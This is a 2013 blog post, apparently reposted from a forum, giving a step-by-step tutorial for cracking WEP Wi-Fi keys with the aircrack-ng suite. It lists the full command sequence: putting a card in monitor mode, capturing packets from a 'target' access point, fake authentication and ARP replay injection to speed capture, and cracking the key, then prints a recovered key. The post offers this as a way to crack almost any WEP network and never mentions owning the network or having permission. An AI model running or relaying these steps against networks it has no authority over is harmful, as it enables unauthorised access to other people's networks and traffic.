Saturday, February 16, 2013

WEP Cracking using backtrack

WEP Cracking

What is Aircrack-NG?


Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.


How do i use this tool?

Simple, just follow my tutorial and you'll be able to crack ALMOST any WEP encrypted password.

These are active attacks, which means that you have to be near the target router in order for this to work. About 50% of signal should be good.


Let's Begin.

Open up a terminal and type:

Quote:airmon-ng

Spoiler (Click to Hide)
[Image: IQDaS.png]

This will show you, your wireless card name. In my case it is called wlan1, but i also have wlan0.

Now, we need to set the wireless card in monitor mode, to do that type:
Quote:airmon-ng start wlan1

Ok, your wireless card is now on monitor mode. If you type airmon-ng again, it'll show you mon0

After that, type:
Quote:airodump-ng mon0

Spoiler (Click to Hide)
[Image: SLbK9.png]

When you press enter, it should show you all the Access Points near you.
Copy the BSSID and remember the Channel Number of the target AP.

Press CONTROL+c to cancel. Do this only when you found and copied the info about the target AP.

Spoiler (Click to Hide)
[Image: PbF3r.png]

Now, type:
Quote:airodump-ng -c [channel number] --bssid [bssid] -w wep mon0

Spoiler (Click to Hide)
[Image: WaRxV.png]

You should know start recieving DATA.
Spoiler (Click to Hide)
[Image: oJp5G.png]

To speed up this proccess, open up another terminal and type:
Quote:aireplay-ng -1 0 -a [BSSID] mon0

After it says it was successfull, type:
Quote:aireplay-ng -3 -b [BSSID] mon0

Spoiler (Click to Hide)
[Image: n9Eni.png]

After a some seconds, this should appear:
Spoiler (Click to Hide)
[Image: yVOlw.png]

When you reach 20000 of DATA, which will be really quick if you did what i said above, open another terminal and type:
Quote:aircrack-ng wep-01.cap

Now, wait for some minutes and it should give you the PASSWORD! Yeye


The password is:

Quote:EF855844B288E4BB1BA9ADF14D
Spoiler (Click to Hide)
[Image: xKs6P.png]

0 comments:

Post a Comment